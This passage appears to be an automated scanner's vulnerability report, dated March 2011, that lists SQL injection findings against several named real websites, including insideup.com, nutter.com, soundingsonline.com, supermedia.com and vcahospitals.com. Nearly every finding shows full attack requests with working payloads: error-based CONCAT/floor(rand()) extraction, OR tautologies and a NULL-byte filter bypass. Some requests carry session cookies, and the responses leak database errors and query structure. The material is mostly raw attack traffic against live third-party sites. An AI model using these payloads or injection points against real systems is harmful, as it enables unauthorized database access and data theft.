,concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+''/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/hins00/project.php?catId=50002&iusrc='+(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27'' HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:52 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4888
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
1.18. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1'=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:30 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5103
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&1'=1/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+(se' at line 5

Request 2

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B%27&1''=1 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 4928
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
1.19. http://www.insideup.com/ppc/leadflow/hins00/project.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/hins00/project.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /ppc/leadflow/hins00/project.php?catId=50002&iusrc=%27%2B(select+1+and+row(1%2c1)%3E(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2/1'B%27 HTTP/1.1
Host: www.insideup.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=253555158.1300018899.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; _msuuid_zbygse58m0=0291FF4C-46CC-491C-85AD-35386C724DCE; OAID=f3931b205fed176e3aba403e9465c710; __unam=85a0ee8-12eaf3cfa61-6a1761aa-2; PHPSESSID=vov3lvi3rnk1p5rdd8gdke24o1; __utma=253555158.1232491105.1300018899.1300065868.1301080607.3; __utmc=253555158; __utmb=253555158.1.10.1301080607

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:19:35 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Content-Length: 5103
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
cat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))%2/1'B'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''B'' OR prj.project_page_url = 'leadflow/hins00/project.php?catId=50002&iusrc='+' at line 5
1.20. http://www.nutter.com/careers.php [CareerID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CareerID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CareerID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))&CareerID=17'&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:09:14 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15946

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
</div>
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1 | 1064<BR>
...[SNIP]...
1.21. http://www.nutter.com/careers.php [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nutter.com
Path:   /careers.php

Issue detail

The CategoryID parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the CategoryID parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /careers.php?CategoryID=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))'&CareerID=17&SectionID=380 HTTP/1.1
Host: www.nutter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:08:37 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 15841

<!-- careers start -->


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999
...[SNIP]...
<br />
error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' LIMIT 1' at line 1 | 1064<BR>
...[SNIP]...
1.22. http://www.soundingsonline.com/archives/'+NSFTW+' [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+''?ordering=&searchphrase=all HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:19:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:19:15 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?ordering=&searchphrase=all' AND cookie_info=''' at line 1</font>
...[SNIP]...
1.23. http://www.soundingsonline.com/archives/'+NSFTW+' [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all&1'=1 HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:17:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:17:46 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...
1.24. http://www.soundingsonline.com/archives/'+NSFTW+' [ordering parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The ordering parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ordering parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+'?ordering='&searchphrase=all HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:13:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:13:57 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' AND cookie_info=''' at line 1</font>
...[SNIP]...
1.25. http://www.soundingsonline.com/archives/'+NSFTW+' [searchphrase parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.soundingsonline.com
Path:   /archives/'+NSFTW+'

Issue detail

The searchphrase parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the searchphrase parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /archives/'+NSFTW+'?ordering=&searchphrase=all' HTTP/1.1
Host: www.soundingsonline.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 25 Mar 2011 19:15:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 25 Mar 2011 19:15:26 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''?ordering=&searchphrase=all'' AND cookie_info=''' at line 1</font>
...[SNIP]...
1.26. https://www.supermedia.com/help/direct-mail [trafficSource cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.supermedia.com
Path:   /help/direct-mail

Issue detail

The trafficSource cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the trafficSource cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default%00'; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:39:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 26678


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...
e, server, and channel on
the next lines. */
s.channel="";
s.pagetype="";
s.server="";
s.referrer="http://www.google.com/search?hl=en&q=ac3d5"-alert(1)-"2bfe3cee0a";
s.pageName="";
s.prop1="Processing Error Title";
s.prop2="";
s.prop3="Not Logged in";
s.prop4="";
s.prop5="";
s.prop6="General Exception";
s.prop7="No such flow definition with id '(select 1 and row(1,1)>
...[SNIP]...

Request 2

GET /help/direct-mail HTTP/1.1
Host: www.supermedia.com
Connection: keep-alive
Referer: https://www.supermedia.com/help
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=4487424B77C0217B5BAEF5DAE41C714C.app4-a2; trafficSource=default%00''; CstrStatus=RVU; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139c45525d5f4f58455e445a4a42378b; mbox=session#1301080493266-271579#1301083842|check#true#1301082042; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 200 OK
Server: Unspecified
Date: Fri, 25 Mar 2011 19:39:42 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Connection: close
Cache-Control: private
Content-Length: 25146


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Ddirect Mail</title>


<link type="text/css" rel="st
...[SNIP]...
1.27. http://www.vcahospitals.com/tools/markers_sema.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /tools/markers_sema.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /tools/markers_sema.php?sema='+OR+'ns'%3/1'd'ns HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:16:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 198
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''d'ns' AND i_emergency_only <> 1
   ORDER BY distance' at line 24
1.28. http://www.vcahospitals.com/tools/markers_sema.php [sema parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /tools/markers_sema.php

Issue detail

The sema parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sema parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /tools/markers_sema.php?sema='+OR+'ns'%3d'ns' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; UnicaNIODID=dbDjw98iApF-W2RGZUH; __utmx=107294085.; __utmxx=107294085.; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 19:14:01 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Content-Length: 197
Content-Type: text/html

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''ns'' AND i_emergency_only <> 1
   ORDER BY distance' at line 24

Request 2

GET /tools/markers_sema.php?sema='+OR+'ns'%3d'ns'' HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
